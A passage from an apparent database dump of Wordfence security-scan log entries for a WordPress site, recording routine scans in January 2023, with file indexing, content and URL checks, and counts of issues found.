far'),(23124,1674530000.440409,2,'info','Analyzed 2200 files containing 41.91 MB of data so far'),(23125,1674530004.597517,2,'info','Analyzed 2300 files containing 42.08 MB of data so far'),(23126,1674530010.986203,2,'info','Analyzed 2400 files containing 42.71 MB of data so far'),(23127,1674530015.684014,2,'info','Analyzed 2500 files containing 43.06 MB of data so far'),(23128,1674530019.951936,2,'info','Analyzed 2600 files containing 43.3 MB of data so far'),(23129,1674530024.000122,2,'info','Analyzed 2700 files containing 43.84 MB of data so far'),(23130,1674530029.725227,2,'info','Analyzed 2800 files containing 44.28 MB of data so far'),(23131,1674530034.636902,2,'info','Analyzed 2900 files containing 45.04 MB of data so far'),(23132,1674530042.032659,2,'info','Analyzed 3000 files containing 45.07 MB of data so far'),(23133,1674530047.487382,2,'info','Analyzed 3100 files containing 45.1 MB of data so far'),(23134,1674530051.435876,2,'info','Analyzed 3200 files containing 47.72 MB of data so far'),(23135,1674530061.390773,2,'info','Analyzed 3300 files containing 50.22 MB of data so far'),(23136,1674530065.928804,2,'info','Analyzed 3400 files containing 51.09 MB of data so far'),(23137,1674530071.614499,2,'info','Analyzed 3500 files containing 54.9 MB of data so far'),(23138,1674530078.032710,2,'info','Analyzed 3600 files containing 57.97 MB of data so far'),(23139,1674530082.641363,2,'info','Analyzed 3700 files containing 60.05 MB of data so far'),(23140,1674530087.507274,2,'info','Analyzed 3800 files containing 61.39 MB of data so far'),(23141,1674530092.948696,2,'info','Analyzed 3900 files containing 61.69 MB of data so far'),(23142,1674530097.787862,2,'info','Analyzed 4000 files containing 62.87 MB of data so far'),(23143,1674530103.448610,2,'info','Analyzed 4100 files containing 68.57 MB of data so far'),(23144,1674530109.443990,2,'info','Analyzed 4200 files containing 69.28 MB of data so far'),(23145,1674530113.960382,2,'info','Analyzed 4300 files containing 69.64 MB of data so far'),(23146,1674530119.373447,2,'info','Analyzed 4400 files containing 69.87 MB of data so far'),(23147,1674530124.873703,2,'info','Analyzed 4500 files containing 70.13 MB of data so far'),(23148,1674530129.059852,2,'info','Analyzed 4600 files containing 70.43 MB of data so far'),(23149,1674530133.849872,2,'info','Analyzed 4700 files containing 70.59 MB of data so far'),(23150,1674530142.261644,2,'info','Analyzed 4800 files containing 70.84 MB of data so far'),(23151,1674530147.174155,2,'info','Analyzed 4900 files containing 71.81 MB of data so far'),(23152,1674530151.077261,2,'info','Analyzed 5000 files containing 74.13 MB of data so far'),(23153,1674530157.370519,2,'info','Analyzed 5100 files containing 76.61 MB of data so far'),(23154,1674530162.663543,2,'info','Analyzed 5200 files containing 78.39 MB of data so far'),(23155,1674530166.995107,2,'info','Analyzed 5300 files containing 80.14 MB of data so far'),(23156,1674530172.663969,2,'info','Analyzed 5400 files containing 93.74 MB of data so far'),(23157,1674530177.436665,2,'info','Analyzed 5500 files containing 97.14 MB of data so far'),(23158,1674530185.446313,2,'info','Analyzed 5600 files containing 99.36 MB of data so far'),(23159,1674530194.134632,2,'info','Analyzed 5700 files containing 102.25 MB of data so far'),(23160,1674530198.968122,2,'info','Analyzed 5800 files containing 105.19 MB of data so far'),(23161,1674530204.350324,2,'info','Analyzed 5900 files containing 106.44 MB of data so far'),(23162,1674530210.776587,2,'info','Analyzed 6000 files containing 108.08 MB of data so far'),(23163,1674530217.273123,2,'info','Analyzed 6100 files containing 110.16 MB of data so far'),(23164,1674530226.027499,2,'info','Analyzed 6200 files containing 112.44 MB of data so far'),(23165,1674530231.428067,2,'info','Analyzed 6300 files containing 113.57 MB of data so far'),(23166,1674530240.181984,2,'info','Analyzed 6400 files containing 124.35 MB of data so far'),(23167,1674530253.801149,2,'info','Analyzed 6500 files containing 128.87 MB of data so far'),(23168,1674530261.896063,2,'info','Analyzed 6600 files containing 130.6 MB of data so far'),(23169,1674530271.732381,2,'info','Analyzed 6700 files containing 132.27 MB of data so far'),(23170,1674530277.884453,2,'info','Analyzed 6800 files containing 136.75 MB of data so far'),(23171,1674530284.221780,2,'info','Analyzed 6900 files containing 137.92 MB of data so far'),(23172,1674530291.395892,2,'info','Analyzed 7000 files containing 139.7 MB of data so far'),(23173,1674530291.592151,2,'info','Analyzed 7003 files containing 139.74 MB of data.'),(23181,1674530293.614270,2,'info','Starting scan of file contents'),(23182,1674530294.678486,2,'info','Scanned contents of 16 additional files at 15.34 per second'),(23183,1674530295.686988,2,'info','Scanned contents of 29 additional files at 14.13 per second'),(23184,1674530296.806764,2,'info','Scanned contents of 40 additional files at 12.61 per second'),(23185,1674530297.930570,2,'info','Scanned contents of 45 additional files at 10.48 per second'),(23186,1674530299.152424,2,'info','Scanned contents of 55 additional files at 9.97 per second'),(23187,1674530300.186946,2,'info','Scanned contents of 70 additional files at 10.68 per second'),(23188,1674530303.114342,2,'info','Scanned contents of 82 additional files at 8.65 per second'),(23189,1674530304.232270,2,'info','Scanned contents of 92 additional files at 8.68 per second'),(23190,1674530305.234415,2,'info','Scanned contents of 101 additional files at 8.71 per second'),(23191,1674530306.285906,2,'info','Scanned contents of 111 additional files at 8.77 per second'),(23192,1674530307.375059,2,'info','Scanned contents of 122 additional files at 8.88 per second'),(23193,1674530308.480096,2,'info','Scanned contents of 129 additional files at 8.69 per second'),(23194,1674530309.509667,2,'info','Scanned contents of 132 additional files at 8.32 per second'),(23195,1674530310.517966,2,'info','Scanned contents of 145 additional files at 8.59 per second'),(23196,1674530311.632779,2,'info','Scanned contents of 150 additional files at 8.33 per second'),(23197,1674530312.656925,2,'info','Scanned contents of 168 additional files at 8.83 per second'),(23198,1674530313.713173,2,'info','Scanned contents of 187 additional files at 9.31 per second'),(23199,1674530314.769547,2,'info','Scanned contents of 199 additional files at 9.42 per second'),(23200,1674530315.787239,2,'info','Scanned contents of 219 additional files at 9.89 per second'),(23201,1674530316.875692,2,'info','Scanned contents of 241 additional files at 10.37 per second'),(23202,1674530317.884559,2,'info','Scanned contents of 262 additional files at 10.80 per second'),(23203,1674530319.039194,2,'info','Scanned contents of 264 additional files at 10.39 per second'),(23204,1674530320.085714,2,'info','Scanned contents of 281 additional files at 10.62 per second'),(23205,1674530321.091476,2,'info','Scanned contents of 299 additional files at 10.89 per second'),(23206,1674530322.122874,2,'info','Scanned contents of 313 additional files at 10.99 per second'),(23207,1674530323.256927,2,'info','Scanned contents of 330 additional files at 11.14 per second'),(23208,1674530324.285436,2,'info','Scanned contents of 347 additional files at 11.32 per second'),(23209,1674530325.327472,2,'info','Scanned contents of 359 additional files at 11.33 per second'),(23210,1674530326.366421,2,'info','Scanned contents of 379 additional files at 11.58 per second'),(23211,1674530327.366834,2,'info','Scanned contents of 401 additional files at 11.89 per second'),(23212,1674530328.455363,2,'info','Scanned contents of 419 additional files at 12.03 per second'),(23213,1674530329.460603,2,'info','Scanned contents of 432 additional files at 12.06 per second'),(23214,1674530330.477462,2,'info','Scanned contents of 448 additional files at 12.16 per second'),(23215,1674530331.709747,2,'info','Scanned contents of 463 additional files at 12.16 per second'),(23216,1674530332.812718,2,'info','Scanned contents of 476 additional files at 12.15 per second'),(23217,1674530333.823557,2,'info','Scanned contents of 493 additional files at 12.27 per second'),(23218,1674530334.875752,2,'info','Scanned contents of 498 additional files at 12.08 per second'),(23219,1674530335.944257,2,'info','Scanned contents of 514 additional files at 12.15 per second'),(23220,1674530336.973511,2,'info','Scanned contents of 533 additional files at 12.30 per second'),(23221,1674530337.996437,2,'info','Scanned contents of 552 additional files at 12.44 per second'),(23222,1674530339.016299,2,'info','Scanned contents of 571 additional files at 12.58 per second'),(23223,1674530340.063056,2,'info','Scanned contents of 587 additional files at 12.64 per second'),(23224,1674530341.125396,2,'info','Scanned contents of 602 additional files at 12.68 per second'),(23225,1674530342.130253,2,'info','Scanned contents of 621 additional files at 12.81 per second'),(23226,1674530343.132276,2,'info','Scanned contents of 644 additional files at 13.01 per second'),(23227,1674530344.173479,2,'info','Scanned contents of 662 additional files at 13.10 per second'),(23228,1674530345.176231,2,'info','Scanned contents of 673 additional files at 13.06 per second'),(23229,1674530346.199120,2,'info','Scanned contents of 692 additional files at 13.16 per second'),(23230,1674530347.234283,2,'info','Scanned contents of 712 additional files at 13.28 per second'),(23231,1674530348.264632,2,'info','Scanned contents of 731 additional files at 13.38 per second'),(23232,1674530349.275448,2,'info','Scanned contents of 747 additional files at 13.43 per second'),(23233,1674530351.171707,2,'info','Scanned contents of 756 additional files at 13.14 per second'),(23234,1674530352.224157,2,'info','Scanned contents of 772 additional files at 13.18 per second'),(23235,1674530353.258104,2,'info','Scanned contents of 792 additional files at 13.28 per second'),(23236,1674530354.271164,2,'info','Scanned contents of 808 additional files at 13.33 per second'),(23237,1674530355.309459,2,'info','Scanned contents of 825 additional files at 13.38 per second'),(23238,1674530356.341448,2,'info','Scanned contents of 843 additional files at 13.44 per second'),(23239,1674530357.383330,2,'info','Scanned contents of 854 additional files at 13.40 per second'),(23240,1674530358.466327,2,'info','Scanned contents of 868 additional files at 13.39 per second'),(23241,1674530359.478909,2,'info','Scanned contents of 889 additional files at 13.50 per second'),(23242,1674530360.502805,2,'info','Scanned contents of 900 additional files at 13.46 per second'),(23243,1674530361.529414,2,'info','Scanned contents of 915 additional files at 13.48 per second'),(23244,1674530361.645899,2,'info','Scanned contents of 916 additional files at 13.47 per second'),(23245,1674530361.657255,2,'info','Asking Wordfence to check URLs against malware list.'),(23246,1674530361.686422,2,'info','Checking 2101 host keys against Wordfence scanning servers.'),(23247,1674530362.314551,2,'info','Done host key check.'),(23248,1674530362.805502,2,'info','Done file contents scan'),(23254,1674530363.964833,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(23255,1674530363.980914,2,'info','Checking 323 host keys against Wordfence scanning servers.'),(23256,1674530364.620874,2,'info','Done host key check.'),(23257,1674530364.678609,2,'info','Done examining URLs'),(23262,1674530365.641312,2,'info','Starting password strength check on 1 user.'),(23269,1674530370.049438,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(23270,1674530370.088552,2,'info','Done examining URLs'),(23272,1674530370.377458,1,'info','-------------------'),(23273,1674530370.397279,2,'info','Wordfence used 24.17 MB of memory for scan. Server peak memory usage was: 56.17 MB'),(23274,1674530370.417503,1,'info','Scan Complete. Scanned 7003 files, 10 plugins, 2 themes, 45 posts, 0 comments and 2937 URLs in 8 minutes 43 seconds.'),(23277,1674555478.199078,1,'info','Initiating quick scan'),(23282,1674555478.450029,1,'info','-------------------'),(23283,1674555478.457041,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23284,1674555478.459081,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23287,1674641603.288564,1,'info','Initiating quick scan'),(23292,1674641603.638363,1,'info','-------------------'),(23293,1674641603.652506,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23294,1674641603.657673,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23297,1674727964.638258,1,'info','Initiating quick scan'),(23302,1674727964.917812,1,'info','-------------------'),(23303,1674727964.941482,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23304,1674727964.957565,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23306,1674789253.887328,1,'info','Scheduled Wordfence scan starting at Friday 27th of January 2023 03:14:13 AM'),(23308,1674789255.416267,1,'info','Contacting Wordfence to initiate scan'),(23315,1674789263.468357,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.27 TB'),(23316,1674789263.482196,2,'info','The disk has 3430212.02 MB available'),(23324,1674789265.449733,2,'info','Getting plugin list from WordPress'),(23325,1674789265.614104,2,'info','Found 9 plugins'),(23326,1674789265.679492,2,'info','Getting theme list from WordPress'),(23327,1674789265.941763,2,'info','Found 2 themes'),(23330,1674789268.273447,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(23331,1674789268.285416,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(23332,1674789268.320808,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(23333,1674789268.331579,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(23334,1674789268.364183,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(23335,1674789268.398420,10,'info','SUM_DISABLED:Skipping theme scan'),(23336,1674789268.410302,10,'info','SUM_DISABLED:Skipping plugin scan'),(23337,1674789268.434694,10,'info','SUM_START:Scanning for known malware files'),(23338,1674789268.467500,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(23339,1674789268.671106,2,'info','500 files indexed'),(23340,1674789268.876615,2,'info','1000 files indexed'),(23341,1674789269.018586,2,'info','1500 files indexed'),(23342,1674789269.132896,2,'info','2000 files indexed'),(23343,1674789269.183123,2,'info','2500 files indexed'),(23344,1674789269.286609,2,'info','3000 files indexed'),(23345,1674789269.354426,2,'info','3500 files indexed'),(23346,1674789269.472325,2,'info','4000 files indexed'),(23347,1674789269.648415,2,'info','4500 files indexed'),(23348,1674789269.780798,2,'info','5000 files indexed'),(23349,1674789269.895169,2,'info','5500 files indexed'),(23350,1674789270.135365,2,'info','6000 files indexed'),(23351,1674789270.476955,2,'info','6500 files indexed'),(23352,1674789270.505020,2,'info','7000 files indexed'),(23353,1674789270.525337,2,'info','7003 files indexed'),(23354,1674789275.965953,2,'info','Analyzed 100 files containing 1.7 MB of data so far'),(23355,1674789281.397950,2,'info','Analyzed 200 files containing 2.9 MB of data so far'),(23356,1674789286.715847,2,'info','Analyzed 300 files containing 4.11 MB of data so far'),(23357,1674789294.832692,2,'info','Analyzed 400 files containing 6.95 MB of data so far'),(23358,1674789300.770472,2,'info','Analyzed 500 files containing 7.86 MB of data so far'),(23359,1674789306.536127,2,'info','Analyzed 600 files containing 8.88 MB of data so far'),(23360,1674789311.604607,2,'info','Analyzed 700 files containing 12.73 MB of data so far'),(23361,1674789315.477504,2,'info','Analyzed 800 files containing 15.15 MB of data so far'),(23362,1674789324.414224,2,'info','Analyzed 900 files containing 18.65 MB of data so far'),(23363,1674789328.765462,2,'info','Analyzed 1000 files containing 20.11 MB of data so far'),(23364,1674789333.359540,2,'info','Analyzed 1100 files containing 21.9 MB of data so far'),(23365,1674789337.468089,2,'info','Analyzed 1200 files containing 28.93 MB of data so far'),(23366,1674789344.073118,2,'info','Analyzed 1300 files containing 31.22 MB of data so far'),(23367,1674789348.054464,2,'info','Analyzed 1400 files containing 32.22 MB of data so far'),(23368,1674789353.487611,2,'info','Analyzed 1500 files containing 33.5 MB of data so far'),(23369,1674789359.232155,2,'info','Analyzed 1600 files containing 33.93 MB of data so far'),(23370,1674789364.040277,2,'info','Analyzed 1700 files containing 34.52 MB of data so far'),(23371,1674789368.435966,2,'info','Analyzed 1800 files containing 34.82 MB of data so far'),(23372,1674789373.521455,2,'info','Analyzed 1900 files containing 35.42 MB of data so far'),(23373,1674789378.019499,2,'info','Analyzed 2000 files containing 38.17 MB of data so far'),(23374,1674789391.565572,2,'info','Analyzed 2100 files containing 41.04 MB of data so far'),(23375,1674789399.921010,2,'info','Analyzed 2200 files containing 41.91 MB of data so far'),(23376,1674789403.966558,2,'info','Analyzed 2300 files containing 42.08 MB of data so far'),(23377,1674789409.120265,2,'info','Analyzed 2400 files containing 42.71 MB of data so far'),(23378,1674789413.185624,2,'info','Analyzed 2500 files containing 43.06 MB of data so far'),(23379,1674789417.510741,2,'info','Analyzed 2600 files containing 43.3 MB of data so far'),(23380,1674789422.468917,2,'info','Analyzed 2700 files containing 43.84 MB of data so far'),(23381,1674789427.693997,2,'info','Analyzed 2800 files containing 44.28 MB of data so far'),(23382,1674789432.025870,2,'info','Analyzed 2900 files containing 45.04 MB of data so far'),(23383,1674789435.966620,2,'info','Analyzed 3000 files containing 45.07 MB of data so far'),(23384,1674789441.496912,2,'info','Analyzed 3100 files containing 45.1 MB of data so far'),(23385,1674789446.885343,2,'info','Analyzed 3200 files containing 47.72 MB of data so far'),(23386,1674789451.762480,2,'info','Analyzed 3300 files containing 50.22 MB of data so far'),(23387,1674789457.645504,2,'info','Analyzed 3400 files containing 51.09 MB of data so far'),(23388,1674789463.531733,2,'info','Analyzed 3500 files containing 54.9 MB of data so far'),(23389,1674789468.179548,2,'info','Analyzed 3600 files containing 57.97 MB of data so far'),(23390,1674789473.576023,2,'info','Analyzed 3700 files containing 60.05 MB of data so far'),(23391,1674789477.810506,2,'info','Analyzed 3800 files containing 61.39 MB of data so far'),(23392,1674789482.570155,2,'info','Analyzed 3900 files containing 61.69 MB of data so far'),(23393,1674789489.055774,2,'info','Analyzed 4000 files containing 62.87 MB of data so far'),(23394,1674789493.960459,2,'info','Analyzed 4100 files containing 68.58 MB of data so far'),(23395,1674789499.043773,2,'info','Analyzed 4200 files containing 69.29 MB of data so far'),(23396,1674789504.616949,2,'info','Analyzed 4300 files containing 69.65 MB of data so far'),(23397,1674789508.900951,2,'info','Analyzed 4400 files containing 69.87 MB of data so far'),(23398,1674789513.699441,2,'info','Analyzed 4500 files containing 70.14 MB of data so far'),(23399,1674789519.676365,2,'info','Analyzed 4600 files containing 70.44 MB of data so far'),(23400,1674789524.193658,2,'info','Analyzed 4700 files containing 70.59 MB of data so far'),(23401,1674789529.788376,2,'info','Analyzed 4800 files containing 70.85 MB of data so far'),(23402,1674789535.489930,2,'info','Analyzed 4900 files containing 71.82 MB of data so far'),(23403,1674789539.760395,2,'info','Analyzed 5000 files containing 74.14 MB of data so far'),(23404,1674789544.015964,2,'info','Analyzed 5100 files containing 76.62 MB of data so far'),(23405,1674789548.779674,2,'info','Analyzed 5200 files containing 78.4 MB of data so far'),(23406,1674789553.880171,2,'info','Analyzed 5300 files containing 80.15 MB of data so far'),(23407,1674789559.005905,2,'info','Analyzed 5400 files containing 93.74 MB of data so far'),(23408,1674789565.857003,2,'info','Analyzed 5500 files containing 97.15 MB of data so far'),(23409,1674789570.111210,2,'info','Analyzed 5600 files containing 99.37 MB of data so far'),(23410,1674789574.312476,2,'info','Analyzed 5700 files containing 102.25 MB of data so far'),(23411,1674789578.947944,2,'info','Analyzed 5800 files containing 105.2 MB of data so far'),(23412,1674789583.986493,2,'info','Analyzed 5900 files containing 106.44 MB of data so far'),(23413,1674789588.344294,2,'info','Analyzed 6000 files containing 108.09 MB of data so far'),(23414,1674789595.572464,2,'info','Analyzed 6100 files containing 110.17 MB of data so far'),(23415,1674789603.556855,2,'info','Analyzed 6200 files containing 112.45 MB of data so far'),(23416,1674789609.682551,2,'info','Analyzed 6300 files containing 113.58 MB of data so far'),(23417,1674789617.685646,2,'info','Analyzed 6400 files containing 124.35 MB of data so far'),(23418,1674789624.714211,2,'info','Analyzed 6500 files containing 128.87 MB of data so far'),(23419,1674789633.358813,2,'info','Analyzed 6600 files containing 130.6 MB of data so far'),(23420,1674789639.626640,2,'info','Analyzed 6700 files containing 132.28 MB of data so far'),(23421,1674789647.623339,2,'info','Analyzed 6800 files containing 136.75 MB of data so far'),(23422,1674789653.875665,2,'info','Analyzed 6900 files containing 137.93 MB of data so far'),(23423,1674789660.388706,2,'info','Analyzed 7000 files containing 139.7 MB of data so far'),(23424,1674789660.546774,2,'info','Analyzed 7003 files containing 139.74 MB of data.'),(23425,1674789660.553074,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(23426,1674789660.586185,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(23427,1674789660.625494,10,'info','SUM_ENDOK:Scanning for known malware files'),(23428,1674789660.678620,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(23429,1674789660.708884,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(23430,1674789660.753611,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(23431,1674789660.800507,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(23432,1674789662.559492,2,'info','Starting scan of file contents'),(23433,1674789664.459946,2,'info','Scanned contents of 16 additional files at 15.32 per second'),(23434,1674789665.495952,2,'info','Scanned contents of 26 additional files at 12.50 per second'),(23435,1674789666.535425,2,'info','Scanned contents of 49 additional files at 15.71 per second'),(23436,1674789667.678811,2,'info','Scanned contents of 71 additional files at 16.65 per second'),(23437,1674789668.762531,2,'info','Scanned contents of 89 additional files at 16.65 per second'),(23438,1674789669.776079,2,'info','Scanned contents of 108 additional files at 16.98 per second'),(23439,1674789670.780618,2,'info','Scanned contents of 130 additional files at 17.65 per second'),(23440,1674789671.780823,2,'info','Scanned contents of 143 additional files at 17.09 per second'),(23441,1674789674.584206,2,'info','Scanned contents of 150 additional files at 13.43 per second'),(23442,1674789675.601147,2,'info','Scanned contents of 158 additional files at 12.97 per second'),(23443,1674789676.613662,2,'info','Scanned contents of 177 additional files at 13.41 per second'),(23444,1674789677.637377,2,'info','Scanned contents of 194 additional files at 13.64 per second'),(23445,1674789678.679027,2,'info','Scanned contents of 210 additional files at 13.76 per second'),(23446,1674789679.932932,2,'info','Scanned contents of 216 additional files at 13.08 per second'),(23447,1674789680.964181,2,'info','Scanned contents of 235 additional files at 13.39 per second'),(23448,1674789681.977680,2,'info','Scanned contents of 254 additional files at 13.68 per second'),(23449,1674789682.993249,2,'info','Scanned contents of 277 additional files at 14.15 per second'),(23450,1674789684.048309,2,'info','Scanned contents of 300 additional files at 14.54 per second'),(23451,1674789685.072430,2,'info','Scanned contents of 319 additional files at 14.73 per second'),(23452,1674789686.080196,2,'info','Scanned contents of 334 additional files at 14.74 per second'),(23453,1674789687.099220,2,'info','Scanned contents of 355 additional files at 14.99 per second'),(23454,1674789688.119202,2,'info','Scanned contents of 364 additional files at 14.73 per second'),(23455,1674789689.125454,2,'info','Scanned contents of 383 additional files at 14.90 per second'),(23456,1674789690.139637,2,'info','Scanned contents of 401 additional files at 15.01 per second'),(23457,1674789691.201194,2,'info','Scanned contents of 416 additional files at 14.97 per second'),(23458,1674789692.314063,2,'info','Scanned contents of 430 additional files at 14.88 per second'),(23459,1674789693.393467,2,'info','Scanned contents of 441 additional files at 14.71 per second'),(23460,1674789694.419774,2,'info','Scanned contents of 456 additional files at 14.71 per second'),(23461,1674789696.560884,2,'info','Scanned contents of 463 additional files at 13.97 per second'),(23462,1674789697.718784,2,'info','Scanned contents of 476 additional files at 13.88 per second'),(23463,1674789698.734894,2,'info','Scanned contents of 493 additional files at 13.96 per second'),(23464,1674789699.753638,2,'info','Scanned contents of 512 additional files at 14.09 per second'),(23465,1674789700.768098,2,'info','Scanned contents of 530 additional files at 14.19 per second'),(23466,1674789701.792840,2,'info','Scanned contents of 544 additional files at 14.18 per second'),(23467,1674789702.808143,2,'info','Scanned contents of 563 additional files at 14.29 per second'),(23468,1674789703.872759,2,'info','Scanned contents of 582 additional files at 14.39 per second'),(23469,1674789704.892264,2,'info','Scanned contents of 592 additional files at 14.27 per second'),(23470,1674789705.928243,2,'info','Scanned contents of 609 additional files at 14.33 per second'),(23471,1674789707.002973,2,'info','Scanned contents of 623 additional files at 14.29 per second'),(23472,1674789708.049648,2,'info','Scanned contents of 639 additional files at 14.32 per second'),(23473,1674789709.145734,2,'info','Scanned contents of 659 additional files at 14.41 per second'),(23474,1674789710.670562,2,'info','Scanned contents of 667 additional files at 14.11 per second'),(23475,1674789711.736332,2,'info','Scanned contents of 674 additional files at 13.95 per second'),(23476,1674789713.141260,2,'info','Scanned contents of 677 additional files at 13.61 per second'),(23477,1674789714.281239,2,'info','Scanned contents of 690 additional files at 13.57 per second'),(23478,1674789715.344661,2,'info','Scanned contents of 714 additional files at 13.75 per second'),(23479,1674789716.373283,2,'info','Scanned contents of 732 additional files at 13.82 per second'),(23480,1674789717.376738,2,'info','Scanned contents of 743 additional files at 13.77 per second'),(23481,1674789718.384594,2,'info','Scanned contents of 756 additional files at 13.75 per second'),(23482,1674789719.440861,2,'info','Scanned contents of 775 additional files at 13.83 per second'),(23483,1674789720.664341,2,'info','Scanned contents of 795 additional files at 13.89 per second'),(23484,1674789721.675554,2,'info','Scanned contents of 809 additional files at 13.89 per second'),(23485,1674789722.728324,2,'info','Scanned contents of 829 additional files at 13.98 per second'),(23486,1674789723.767829,2,'info','Scanned contents of 846 additional files at 14.02 per second'),(23487,1674789724.773121,2,'info','Scanned contents of 867 additional files at 14.13 per second'),(23488,1674789725.787687,2,'info','Scanned contents of 886 additional files at 14.21 per second'),(23489,1674789726.839819,2,'info','Scanned contents of 900 additional files at 14.19 per second'),(23490,1674789727.855832,2,'info','Scanned contents of 916 additional files at 14.21 per second'),(23491,1674789727.860928,2,'info','Asking Wordfence to check URLs against malware list.'),(23492,1674789727.872393,2,'info','Checking 2101 host keys against Wordfence scanning servers.'),(23493,1674789728.505979,2,'info','Done host key check.'),(23494,1674789730.084161,2,'info','Done file contents scan'),(23495,1674789730.095318,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(23496,1674789730.137173,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(23497,1674789730.242407,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(23498,1674789730.317873,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(23499,1674789730.399116,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(23500,1674789732.235232,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(23501,1674789732.245953,2,'info','Checking 323 host keys against Wordfence scanning servers.'),(23502,1674789732.863216,2,'info','Done host key check.'),(23503,1674789732.899551,2,'info','Done examining URLs'),(23504,1674789733.092748,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(23505,1674789733.149811,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(23506,1674789733.573989,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(23507,1674789733.619836,10,'info','SUM_START:Scanning for weak passwords'),(23508,1674789733.655154,2,'info','Starting password strength check on 1 user.'),(23509,1674789733.756578,10,'info','SUM_ENDOK:Scanning for weak passwords'),(23510,1674789733.804737,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23511,1674789738.160068,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23512,1674789738.449026,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(23513,1674789739.146784,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(23514,1674789739.502559,10,'info','SUM_START:Scanning for suspicious site options'),(23515,1674789739.865086,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(23516,1674789739.886626,2,'info','Done examining URLs'),(23517,1674789740.110042,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(23518,1674789740.188930,1,'info','-------------------'),(23519,1674789740.213869,2,'info','Wordfence used 24.17 MB of memory for scan. Server peak memory usage was: 56.17 MB'),(23520,1674789740.224909,1,'info','Scan Complete. Scanned 7003 files, 10 plugins, 2 themes, 45 posts, 0 comments and 2937 URLs in 8 minutes 4 seconds.'),(23521,1674789740.236043,10,'info','SUM_FINAL:Scan complete. You have 1006 new issues to fix. See below.'),(23522,1674814315.206730,10,'info','SUM_PREP:Preparing a new scan.'),(23523,1674814315.249167,1,'info','Initiating quick scan'),(23524,1674814315.292718,10,'info','SUM_START:Checking Web Application Firewall status'),(23525,1674814315.318910,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23526,1674814315.367273,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23527,1674814315.672609,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23528,1674814315.715568,1,'info','-------------------'),(23529,1674814315.745294,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23530,1674814315.766380,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23531,1674814315.784099,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(23532,1674900739.290893,10,'info','SUM_PREP:Preparing a new scan.'),(23533,1674900739.351520,1,'info','Initiating quick scan'),(23534,1674900739.381688,10,'info','SUM_START:Checking Web Application Firewall status'),(23535,1674900739.394781,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23536,1674900739.437746,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23537,1674900739.642156,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23538,1674900739.673205,1,'info','-------------------'),(23539,1674900739.696728,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23540,1674900739.710575,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23541,1674900739.721892,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(23542,1674987335.811915,10,'info','SUM_PREP:Preparing a new scan.'),(23543,1674987335.982182,1,'info','Initiating quick scan'),(23544,1674987336.052403,10,'info','SUM_START:Checking Web Application Firewall status'),(23545,1674987336.167274,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23546,1674987336.299530,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23547,1674987336.959102,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23548,1674987337.038218,1,'info','-------------------'),(23549,1674987337.082663,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23550,1674987337.104173,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23551,1674987337.134372,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(23552,1675048471.063202,1,'info','Scheduled Wordfence scan starting at Monday 30th of January 2023 03:14:31 AM'),(23553,1675048472.508818,10,'info','SUM_PREP:Preparing a new scan.'),(23554,1675048472.554249,1,'info','Contacting Wordfence to initiate scan'),(23555,1675048473.841155,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(23556,1675048475.936506,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(23557,1675048477.967201,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(23558,1675048480.016739,10,'info','SUM_START:Checking for the most secure way 